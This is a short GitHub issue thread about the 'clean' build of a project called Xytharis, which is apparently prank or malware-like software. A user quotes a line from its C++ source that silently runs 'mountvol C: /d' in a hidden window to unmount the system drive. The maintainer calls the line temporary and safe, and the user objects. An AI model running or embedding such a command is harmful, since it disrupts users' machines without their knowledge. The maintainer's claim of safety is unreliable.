### ISSUE TITLE
Is the clean version safe?

### ISSUE THREAD

**Issue by winapiadmin** [kevlu8/Xytharis#8]
The Clean\Code\XytharisClean\XytharisClean.cpp containing this dangerous code:
`ShellExecuteA(NULL, "open" "C:\\Windows\\System32\\cmd.exe", "mountvol C: /d", NULL, NULL, SW_HIDE);`
This unmount the drive C: .
Is it clean and safe?

**Comment by kevlu8** [comment]
i believe it's a temporary change that will revert on restart -- should be safe overall, but still please save your current running programs before running the clean version

**Comment by winapiadmin** [comment]
But do it may prevent the restart normally(force restart required).
